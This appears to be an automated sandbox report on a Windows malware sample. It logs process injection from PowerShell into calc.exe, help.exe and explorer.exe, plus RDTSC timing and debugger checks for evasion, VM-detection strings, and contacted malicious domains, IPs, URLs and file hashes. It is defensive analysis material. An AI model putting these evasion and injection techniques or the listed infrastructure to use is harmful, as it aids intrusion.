Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\calc.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\calc.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 00000000001A98E4 second address: 00000000001A98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 00000000001A9B4E second address: 00000000001A9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4706			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4066			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3556	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5884	Thread sleep time: -38000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 4732	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: explorer.exe, 0000000A.00000000.303017451.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000A.00000000.320295522.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000A.00000000.280926242.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 0000000A.00000000.303675861.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000000A.00000000.329155939.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000A.00000000.303675861.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\calc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\explorer.exe	Network Connect: 192.185.17.130 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.strawberrylinebikehire.com
Source: C:\Windows\explorer.exe	Domain query: www.rajuherbalandspicegarden.com

Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\calc.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Thread register set: target process: 3472			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\calc.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\calc.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\calc.exe base: 2BC5008	Jump to behavior

Source: explorer.exe, 0000000A.00000000.304127753.00000000089FF000.00000004.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000000A.00000000.315976236.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000000A.00000000.281111735.0000000001640000.00000002.00000001.sdmp, help.exe, 00000013.00000002.497981699.0000000003EF0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.185.17.130	rajuherbalandspicegarden.com	United States		46606	UNIFIEDLAYER-AS-1US	true
162.159.134.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

Windows Analysis Report s2rsXUiUn8

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Name	IP	Active
google.com	216.58.215.238	true
cdn.discordapp.com	162.159.134.233	true
rajuherbalandspicegarden.com	192.185.17.130	true
www.strawberrylinebikehire.com	unknown	unknown
www.rajuherbalandspicegarden.com	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.rajuherbalandspicegarden.com/pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH	true	Avira URL Cloud: safe	unknown
www.homekeycap.com/pjje/	true	Avira URL Cloud: safe	low

ID:	452684
Product:	CloudBasic
Start time:	17:58:33
Start date:	22.07.2021
Sample:	s2rsXUiUn8
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	f5041ec4ce468a07ecbfd076bc0f879b
SHA1:	bda8cea1ec8d1cea253fc661559cd84cee2195b9
SHA256:	caff14d450514a35eac5ba34b3e74126360662d7c8fdf60a8008a0e3bb8ed0b3
Filetype:	Win64 Executable Console (202006/5) 92.64%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\oad[1].jpg	ASCII text, with very long lines, with no line terminators	7E40951D41A43B25F38C6DD25DC4BFE3	D389E4ED359D16981FF0E05739AC4C4A96311C60	64A73E000DC919BC362CEA33F87549DA0D847C16F826E62138BF269006EF8C1C
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	1F1446CE05A385817C3EF20CBD8B6E6A	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	5A7C43375E2B3C9D028C036F7E199FDF	0B83ACEFE60D292C1A76DCEA7160D6E14D2FAA77	04DC7F291DA8492242C8386028CC4D8DAB5ADA6DDA60A08677495495E2A6F6A8
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pghm4uj.4m1.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlvkzbwx.aab.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\Documents\20210722\PowerShell_transcript.965543.TYqX5dwv.20210722175925.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	2A0D140A36C556BC4C74DF793E698D99	299D4F22830E4FF96EC8093F77B29C93779B9E41	A090D1E73A91DDFD68E472ADD0FE24FBCF94505500A111CEF0D4642E529DA9CB